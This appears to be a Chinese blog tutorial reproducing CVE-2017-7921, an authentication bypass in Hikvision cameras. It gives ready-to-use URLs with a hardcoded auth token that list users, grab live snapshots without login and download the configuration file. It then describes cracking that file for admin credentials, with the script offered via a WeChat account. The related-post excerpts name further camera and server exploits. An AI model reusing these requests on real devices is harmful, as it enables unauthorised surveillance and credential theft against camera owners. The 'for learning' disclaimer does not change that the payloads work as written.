注:此教程仅供学习参考,不涉及任何以破坏为目的的违法犯罪,个人行为与作者无关。

一、漏洞描述

1.这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。

二、漏洞复现

1.在web浏览器中输入以下代码来检索用户与用户列

http://摄像头IP地址/Security/users?auth=YWRtaW46MTEK

2.在没有进行登录的情况下获取监控快照

http://摄像头IP地址/onvif-http/snapshot?auth=YWRtaW46MTEK

3.下载摄像头配置文件

http://摄像头IP地址/System/configurationFile?auth=YWRtaW46MTEK

4.用python脚本对配置文件进行破解(脚本放在结尾)

5.验证密码是否正确

关注微信公众号菜鸟学渗透后台回复CVE-2017-7921获取脚本

得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我!

CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现相关推荐

  1. CVE(2017-15715、2021-41773、2021-40438)漏洞复现

    仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...

  2. HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)

    2023年将会持续于B站.CSDN等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力. 页面: POC: PUT /SDK/webLanguage HTTP/1.1 Ho ...

  3. 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)

    0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...

  4. 海康威视iVMS系统在野 0day漏洞复现

    漏洞概述 简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshe ...

  5. 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)

    前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...

  6. 海康摄像头CVE-2021-36260漏洞复现

    海康摄像头CVE-2021-36260漏洞复现 1.漏洞介绍 2.手动测试 2.1.摄像头版本 2.2.漏洞复现 2.2.1.更改URL 2.2.2.抓包修改数据 2.2.3.更换请求路径 2.2.4 ...

  7. 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)

    文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...

  8. java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...

  9. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

最新文章

  1. mysql 上一条_mysql选择上一条、下一条数据记录
  2. python编程工具是什么_python编程应该用什么工具
  3. flash调用swf文件服务器,浏览器如何加载Flash文件? (SWF)
  4. 钉钉微应用怎么进入_钉钉微应用如何打开本地app (Android)-问答-阿里云开发者社区-阿里云...
  5. opencv 伽马变换
  6. Ajax专题:异步交互局部刷新初步
  7. IDEA中使用SVN IDEA配置SVN步骤(git也是)
  8. wpf listview 大数据界面刷新
  9. 万兆局域网方案_局域网组建实施方案.doc
  10. mysql5.464位下载_MySQL Front 64位
  11. 在 X11 中实现 GTK+ 3 的 OpenGL 支持
  12. AD10 BOM制作
  13. 利用百度地图开放平台的Web API实现检索定位
  14. 扁豆凝集素LCA/LcH填料/小扁豆凝集素-琼脂糖凝胶/双花扁豆凝集素DBA/黑皮扁豆凝集素
  15. 一套asp.net开发的快递单打印系统源码
  16. 帮你抢小游戏流量红利——360小游戏接入指南
  17. 医疗器械生物相容性评价
  18. 【微信小程序】关于使用ECharts制作图表
  19. 高斯朴素贝叶斯分类的原理解释和手写代码实现
  20. 六星教育python怎么样_怎么样才能学好Python?六星教育把最简单的方法告诉你

热门文章

  1. Cisco PIX防火墙配置指南
  2. Matlab 并行计算学习初步
  3. 接口数据: 如何安全传输存储
  4. 可转位刀片的型号表示
  5. 大亚湾核电基地累计对港供电达2488亿度
  6. Android开发:gradle配置
  7. 目前有哪些前沿的肿瘤治疗方法正在研究?
  8. Excel数据分析从入门到精通(十三)28个图表之趋势分析+转化分析
  9. 英语二计算机考研,2020考研分别适用于英语一英语二的专业盘点
  10. asterisk 数据库 php,使用FreePBX和Asterisk调用PHP脚本